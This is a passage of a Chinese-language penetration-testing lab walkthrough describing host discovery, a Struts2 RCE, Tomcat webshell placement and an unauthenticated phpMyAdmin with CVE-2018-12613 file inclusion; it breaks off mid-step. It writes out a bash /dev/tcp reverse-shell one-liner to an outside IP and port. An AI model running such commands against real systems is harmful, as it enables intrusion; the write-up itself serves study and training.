信息收集
netdiscover
的主机发现部分不再详解,通过访问端口得知20001-2003端口都为web端口,所以优先考虑从此方向下手
外网渗透
GetShell
Struct漏洞
访问2001端口后,插件Wappalyzer爬取得知这是一个基于Struct的web站点,直接考虑struct工具,一把梭
发现struct2漏洞,无法完整获得webshell,只有一个RCE权限,这里可以采用这种方法:
在revshell.com上生成一句话shell,ehco到文件中,然后使用bash执行,比如
0<&150-;exec 150<>/dev/tcp/192.168.253.174/4546;sh <&150 >&150 2>&150
表示向192.168.253.174的4546端口反射shell
python -c 'import pty;pty.spwn("/bin/bash")'
一下子,就可以拿到root权限的shell了
Tomcat RCE
直接searchsploit,但是下载到EXP之后利用起来有点困难
tomcat的利用方式有时候有些奇怪,因为写入的webshell可能不在发布目录
绝对路径是在usr/local/tomcat/webapps/ROOT/
然而shell显示的路径在/usr/local/tomcat
所以一定要找好上传的webshell位置
phpMyAdmin
2003端口浏览器打开后发现是一个无需登录的phpMyAdmin管理站点
这个利用方式相对困难,不能使用脚本一把梭
拿到一个SQL权限我会考虑两种技术:
-
secure_file_priv
-
general_log
但是发现这里的用户权限较低,无法打开日志功能,第二种方法失败:
且无法写出文件,第一种方法失败:
所以这里应考虑CVE,查看phpMyAdmin版本,搜索对应版本漏洞
发现 cve-2018-12613
,好嘛,本地文件包含!但是当我设置好路径exploit时,却发现: